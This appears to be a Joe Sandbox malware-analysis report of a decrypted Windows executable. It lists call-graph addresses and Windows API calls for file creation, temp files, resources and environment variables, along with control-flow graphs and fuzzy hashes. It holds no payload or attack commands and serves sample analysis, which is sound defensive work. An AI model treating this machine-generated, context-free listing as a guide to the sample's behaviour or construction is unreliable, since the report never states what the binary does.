10303 1400073fa WideCharToMultiByte 10301->10303 10302->10255 10303->10302 10305 1400122f0 2 API calls 10304->10305 10306 140003197 10305->10306 10307 14000dd30 11 API calls 10306->10307 10308 1400031c9 10306->10308 10307->10308 10309 140012360 HeapFree 10308->10309 10310 1400031eb 10309->10310 10310->10276 10344 1400112a8 RtlEnterCriticalSection 10311->10344 10313 14000e0cc 10314 14000e0d8 CreateFileW 10313->10314 10320 14000e1ae 10313->10320 10315 14000e10f CreateFileW 10314->10315 10316 14000e13d 10314->10316 10315->10316 10317 14000e165 10315->10317 10316->10317 10318 14000e14d RtlAllocateHeap 10316->10318 10317->10320 10353 1400111dc RtlEnterCriticalSection 10317->10353 10318->10317 10320->10279 10322 14000e5b0 10321->10322 10325 14000e604 10321->10325 10322->10325 10363 140011248 RtlEnterCriticalSection 10322->10363 10325->10281 10326 14000e5f1 WriteFile 10326->10325 10327 14000e5d5 10328 14000e620 5 API calls 10327->10328 10329 14000e5dd 10328->10329 10329->10281 10331 14000dd3f 10330->10331 10332 14000dd50 10330->10332 10334 140011a81 10331->10334 10367 140011c48 RtlEnterCriticalSection 10331->10367 10333 140011248 2 API calls 10332->10333 10335 14000dd64 10333->10335 10334->10284 10337 14000dda6 10335->10337 10339 14000dd8e CloseHandle 10335->10339 10341 14000ddc0 WriteFile 10335->10341 10337->10284 10338 140011a65 10338->10334 10368 140011bdc 10338->10368 10340 1400111dc 4 API calls 10339->10340 10340->10337 10342 14000dd7b HeapFree 10341->10342 10342->10339 10345 1400112e3 10344->10345 10346 1400112d0 10344->10346 10348 140011312 10345->10348 10349 1400112e9 RtlReAllocateHeap 10345->10349 10361 140011cb0 RtlAllocateHeap 10346->10361 10350 1400112de RtlLeaveCriticalSection 10348->10350 10351 14001132d RtlAllocateHeap 10348->10351 10349->10348 10350->10313 10351->10350 10354 140011200 10353->10354 10355 14001121f 10353->10355 10354->10355 10356 140011206 10354->10356 10357 140011c68 HeapFree 10355->10357 10358 140011213 memset 10356->10358 10359 14001122b RtlLeaveCriticalSection 10356->10359 10357->10359 10358->10359 10360 14001f7e0 10359->10360 10362 140011cd3 10361->10362 10362->10350 10364 14001127a RtlLeaveCriticalSection 10363->10364 10365 14001126c 10363->10365 10366 14000e5c4 10364->10366 10365->10364 10366->10325 10366->10326 10366->10327 10367->10338 10369 140011be7 10368->10369 10370 140011c3c 10369->10370 10371 140011c32 RtlLeaveCriticalSection 10369->10371 10370->10338 10371->10370 10372->10294 10374 1400082e4 10373->10374 10375 140008397 10374->10375 10386 14000830a 10374->10386 10376 140012630 TlsGetValue 10375->10376 10378 14000839f 10376->10378 10377 140005477 10377->9604 10379 1400083ba 10378->10379 10380 1400083aa _wcsdup 10378->10380 10381 140012630 TlsGetValue 10379->10381 10380->10379 10382 1400083c2 10381->10382 10383 1400083d8 10382->10383 10384 1400083cd _wcsdup 10382->10384 10385 140012630 TlsGetValue 10383->10385 10384->10383 10387 1400083e0 10385->10387 10386->10377 10388 140008363 wcsncpy 10386->10388 10389 1400083eb _wcsdup 10387->10389 10390 1400083f8 10387->10390 10388->10386 10389->10390 10391 1400126d0 3 API calls 10390->10391 10392 140008481 10391->10392 10393 1400084ed wcsncpy 10392->10393 10394 140008488 10392->10394 10395 14000850e 10392->10395 10393->10395 10396 140008575 10394->10396 10397 14000856d free 10394->10397 10395->10394 10401 1400085c0 wcsncpy 10395->10401 10398 140008587 10396->10398 10399 14000857f free 10396->10399 10397->10396 10398->10377 10400 140008591 free 10398->10400 10399->10398 10400->10377 10401->10395 10403 140011248 2 API calls 10402->10403 10404 140003113 10403->10404 10404->10245 10405->9676 10432->9737 10433->9741 10434->9736 10435->9740 10436->9745 10437->9748 10438->9752 10439->9775 10440->9777 10441->9783 10442->9785 10444 1400035a1 10443->10444 10444->10444 10445 1400123e0 21 API calls 10444->10445 10446 1400035bb 10445->10446 10447 1400122f0 2 API calls 10446->10447 10448 1400035d1 10447->10448 10495 140001735 10448->10495 10450 140003bd0 10545 1400121c0 GetLastError TlsGetValue SetLastError 10450->10545 10452 140003be4 10546 1400121c0 GetLastError TlsGetValue SetLastError 10452->10546 10458 140010ba0 6 API calls 10493 1400035da 10458->10493 10462 140007dc0 6 API calls 10462->10493 10469 140007ce0 5 API calls 10469->10493 10472 140012210 3 API calls 10474 1400036d7 FindResourceW FindResourceW 10472->10474 10474->10493 10477 14000350f 21 API calls 10477->10493 10481 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10481->10493 10482 14000d9ac SetFileAttributesW 10482->10493 10483 140003174 14 API calls 10483->10493 10484 140001284 8 API calls 10484->10493 10485 1400121c0 GetLastError TlsGetValue SetLastError 10485->10493 10486 140003cc9 37 API calls 10486->10493 10488 140006960 48 API calls 10488->10493 10490 1400125d0 TlsGetValue 10490->10493 10491 14000c45c SetEnvironmentVariableW 10491->10493 10493->10450 10493->10458 10493->10462 10493->10469 10493->10472 10493->10477 10493->10481 10493->10482 10493->10483 10493->10484 10493->10485 10493->10486 10493->10488 10493->10490 10493->10491 10494 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10493->10494 10536 140012520 TlsGetValue 10493->10536 10537 140008110 10493->10537 10540 14000d6a0 10493->10540 10494->10493 10496 14000173f 10495->10496 10496->10496 10497 1400123e0 21 API calls 10496->10497 10498 140001759 10497->10498 10529 14000176a 10498->10529 10531 140001956 10498->10531 10499 140012360 HeapFree 10501 140001dfc 10499->10501 10500 1400074e0 9 API calls 10500->10531 10503 140012360 HeapFree 10501->10503 10502 1400018d9 10504 1400073a0 2 API calls 10502->10504 10505 140001e11 10503->10505 10506 1400018e3 10504->10506 10507 140012360 HeapFree 10505->10507 10509 14000190c WriteFile 10506->10509 10508 140001e23 10507->10508 10510 140012360 HeapFree 10508->10510 10511 14000193b 10509->10511 10513 140001e35 10510->10513 10516 1400120d0 3 API calls 10511->10516 10512 1400074e0 9 API calls 10512->10529 10514 140012360 HeapFree 10513->10514 10515 140001e47 10514->10515 10515->10493 10518 140001951 10516->10518 10517 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10517->10529 10518->10499 10519 140003174 14 API calls 10519->10529 10520 1400121c0 GetLastError TlsGetValue SetLastError 10520->10531 10521 1400121c0 GetLastError TlsGetValue SetLastError 10521->10529 10523 140003cc9 37 API calls 10523->10529 10526 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 10526->10531 10527 1400124c0 wcscmp 10527->10531 10528 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10528->10529 10529->10502 10529->10512 10529->10517 10529->10518 10529->10519 10529->10521 10529->10523 10529->10528 10530 1400079d0 10 API calls 10530->10531 10531->10500 10531->10518 10531->10520 10531->10526 10531->10527 10531->10530 10532 14000d914 3 API calls 10531->10532 10535 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 10531->10535 10550 140007920 10531->10550 10558 140012520 TlsGetValue 10531->10558 10559 140012550 TlsGetValue 10531->10559 10560 14000d9ac 10531->10560 10563 1400056b4 10531->10563 10532->10531 10535->10531 10536->10493 10538 1400126d0 3 API calls 10537->10538 10539 14000812e 10538->10539 10539->10539 10541 14001147c 4 API calls 10540->10541 10542 14000d6b6 10541->10542 10545->10452 10551 14000794b 10550->10551 10552 140012630 TlsGetValue 10551->10552 10553 140007968 10552->10553 10554 1400126d0 3 API calls 10553->10554 10555 140007975 10554->10555 10557 140007985 10555->10557 10582 140012850 TlsGetValue 10555->10582 10557->10531 10558->10531 10559->10531 10561 14000d9b7 SetFileAttributesW 10560->10561 10562 14000d9bd 10560->10562 10561->10562 10562->10531 10564 1400123e0 21 API calls 10563->10564 10565 1400056ca 10564->10565 10566 1400122f0 2 API calls 10565->10566 10567 1400056dd 10566->10567 10583 14000cdfc 10567->10583 10570 14000575a 10572 140012360 HeapFree 10570->10572 10571 14000cdfc 11 API calls 10573 140005710 10571->10573 10574 140005787 10572->10574 10575 14000d6a0 5 API calls 10573->10575 10574->10531 10576 140005727 10575->10576 10588 1400121c0 GetLastError TlsGetValue SetLastError 10576->10588 10582->10557 10589 14000cf74 10583->10589 10585 14000ce11 10586 1400056f2 10585->10586 10595 14000d02c 10585->10595 10586->10570 10586->10571 10590 14000cfa2 10589->10590 10592 14000cfe2 10589->10592 10610 14000d3a4 10590->10610 10593 14000cfa7 10592->10593 10594 14000cff8 wcscmp 10592->10594 10593->10585 10594->10592 10594->10593 10596 14000d073 10595->10596 10597 14000d04c 10595->10597 10600 14000d3a4 tolower 10596->10600 10602 14000d08f 10596->10602 10598 14000cf74 2 API calls 10597->10598 10599 14000d051 10598->10599 10599->10596 10601 14000d059 10599->10601 10600->10602 10604 14000d06e 10601->10604 10608 140016bb0 HeapFree 10601->10608 10614 14001147c 10602->10614 10608->10604 10611 14000d3c7 tolower 10610->10611 10612 14000d3b8 10611->10612 10613 14000d3d0 10611->10613 10612->10611 10613->10593 10615 1400114a4 10614->10615 10616 14001149a RtlEnterCriticalSection 10614->10616 10617 14001155e RtlAllocateHeap 10615->10617 10621 1400114b1 10615->10621 10616->10615 10617->10621 10622->8653 10623->8655 10624->8657 10625->8659 10626->8663 10627->8669 10628->8671 10629->8673 10630->8675 10631->8679 10632->8687 10633->8689 10634->8693 10635->8695 10636->8704 10637->8706 10638->8708 10639->8710 10640->8714 10641->8720 10642->8722 10643->8724 10644->8726 10645->8730 10646->8736 10647->8738 10648->8744 10649->8746 10650->8752 10651->8754 10652->8760 10653->8764 10707 140007a00 10710 140007a50 10707->10710 10711 140007a79 10710->10711 10712 140012630 TlsGetValue 10711->10712 10713 140007a92 10712->10713 10714 140012630 TlsGetValue 10713->10714 10715 140007a9c 10714->10715 10716 1400126d0 3 API calls 10715->10716 10717 140007ab1 10716->10717 10718 140007abf 10717->10718 10732 140012850 TlsGetValue 10717->10732 10724 140007acf 10718->10724 10733 140012850 TlsGetValue 10718->10733 10721 140007c35 10734 140012900 TlsGetValue 10721->10734 10723 140007a1c 10724->10721 10725 140007b20 RtlAllocateHeap 10724->10725 10726 140007b50 10724->10726 10725->10726 10727 140007b91 wcsncpy 10726->10727 10730 140007bac 10726->10730 10727->10730 10728 140007c02 10728->10721 10729 140007c09 HeapFree 10728->10729 10729->10721 10730->10728 10731 140007bdf wcsncpy 10730->10731 10731->10728 10732->10718 10733->10724 10734->10723 11029 1400040ac 11030 1400123e0 21 API calls 11029->11030 11031 1400040ce 11030->11031 11032 14000d6a0 5 API calls 11031->11032 11033 1400040da 11032->11033 11042 1400121c0 GetLastError TlsGetValue SetLastError 11033->11042 11035 1400040e4 11043 1400121c0 GetLastError TlsGetValue SetLastError 11035->11043 11037 1400040f8 11038 14000ca00 4 API calls 11037->11038 11039 14000410d 11038->11039 11040 140012210 3 API calls 11039->11040 11041 140004122 11040->11041 11042->11035 11043->11037 10674 14000c6b0 10675 14000c6d1 10674->10675 10676 14000c6c0 RtlRemoveVectoredExceptionHandler 10674->10676 10676->10675 10654 14000de50 10655 1400112a8 5 API calls 10654->10655 10656 14000de98 10655->10656 10657 14000e074 10656->10657 10658 14000deb6 10656->10658 10659 14000defb 10656->10659 10660 14000dec9 10658->10660 10661 14000decd CreateFileW 10658->10661 10662 14000df42 10659->10662 10663 14000df00 10659->10663 10660->10661 10671 14000dfb7 10661->10671 10667 14000df5f CreateFileW 10662->10667 10662->10671 10664 14000df13 10663->10664 10665 14000df17 CreateFileW 10663->10665 10664->10665 10665->10671 10666 14000e04d 10666->10657 10668 1400111dc 4 API calls 10666->10668 10669 14000df8d CreateFileW 10667->10669 10667->10671 10668->10657 10669->10671 10670 14000dff9 10670->10666 10673 14000e036 SetFilePointer 10670->10673 10671->10666 10671->10670 10672 14000dfe1 RtlAllocateHeap 10671->10672 10672->10670 10673->10666 10874 140002853 10875 1400123e0 21 API calls 10874->10875 10876 140002861 10875->10876 10895 1400121c0 GetLastError TlsGetValue SetLastError 10876->10895 10878 14000286b 10896 1400121c0 GetLastError TlsGetValue SetLastError 10878->10896 10880 140002889 10881 140012450 4 API calls 10880->10881 10882 140002898 10881->10882 10897 1400121c0 GetLastError TlsGetValue SetLastError 10882->10897 10884 1400028a6 10898 1400121c0 GetLastError TlsGetValue SetLastError 10884->10898 10886 1400028ba 10899 14000c8e0 10886->10899 10890 1400028d4 10904 1400125d0 TlsGetValue 10890->10904 10892 1400028e5 10893 14000b574 11 API calls 10892->10893 10894 1400028fb 10893->10894 10895->10878 10896->10880 10897->10884 10898->10886 10900 14000c8f0 10899->10900 10901 1400126d0 3 API calls 10900->10901 10902 1400028ca 10901->10902 10903 140012520 TlsGetValue 10902->10903 10903->10890 10904->10892

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                                                                                                                                                                                          • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                                                                                                                          • API String ID: 1993255246-2943376620
                                                                                                                                                                                                          • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                                                                                                                                                                                          • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionHandlerVectored$Remove
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3670940754-0
                                                                                                                                                                                                          • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                                                                                                                                                                          • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$NameTemp$Heap$AllocateErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememcpywcslenwcsncpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1881527299-0
                                                                                                                                                                                                          • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                                                                                                                                                                                          • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 111 14000dfc6-14000dfc9 106->111 112 14000e05d-14000e06f call 1400111dc 106->112 107->108 108->106 109->106 113 14000df5b 110->113 114 14000df5f-14000df8b CreateFileW 110->114 111->112 115 14000dfcf-14000dfd8 111->115 120 14000e074-14000e07c 112->120 113->114 114->111 117 14000df8d-14000dfb5 CreateFileW 114->117 118 14000dff9 115->118 119 14000dfda-14000dfdf 115->119 117->106 122 14000dffd-14000e02d 118->122 119->118 121 14000dfe1-14000dff7 RtlAllocateHeap 119->121 120->99 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->112 123->120 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Create$CriticalSection$AllocateEnterHeapLeavePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3319923023-0
                                                                                                                                                                                                          • Opcode ID: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
                                                                                                                                                                                                          • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 147 140005c09-140005c15 145->147 152 140005cc7-140005ce1 147->152 153 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 147->153 159 140005ce3-140005cef 152->159 153->147 153->152 164 140005da1-140005dbb 159->164 165 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->165 171 140005dbd-140005dc9 164->171 284 140005d96-140005d9b 165->284 177 140005e7f-140005e99 171->177 178 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 171->178 185 140005e9b-140005ea7 177->185 178->171 178->177 192 140005f5d-140005f77 185->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 185->193 201 140005f79-140005f85 192->201 193->185 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 211 140006057-140006063 209->211 210->201 210->209 221 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 211->221 222 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 211->222 428 1400065a1-1400065a6 call 140003ddc 221->428 429 14000657d-14000659f call 140007284 221->429 222->211 222->221 284->159 284->164 433 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->433 429->433
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value$HeapPath$AllocateCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 116240943-0
                                                                                                                                                                                                          • Opcode ID: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                                                                                                                                                                                          • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointermemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1104741977-0
                                                                                                                                                                                                          • Opcode ID: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
                                                                                                                                                                                                          • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 509 1400126d0-1400126f2 TlsGetValue 510 1400126f4-1400126fc 509->510 511 140012700-14001272b 509->511 510->511 512 140012772-14001277f 511->512 513 14001272d-140012770 RtlReAllocateHeap 511->513 514 1400127d0-140012802 512->514 515 140012781-140012789 512->515 513->514 516 140012793-1400127cd RtlReAllocateHeap 515->516 517 14001278b 515->517 516->514 517->516
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2409531576.0000000140001000.00000040.00000001.01000000.00000004.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409510757.0000000140000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409564953.0000000140024000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2409595338.0000000140025000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_140000000_decrypted_executable.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap$Value
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2497967046-0
                                                                                                                                                                                                          • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                                                                                                                                                                                          • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
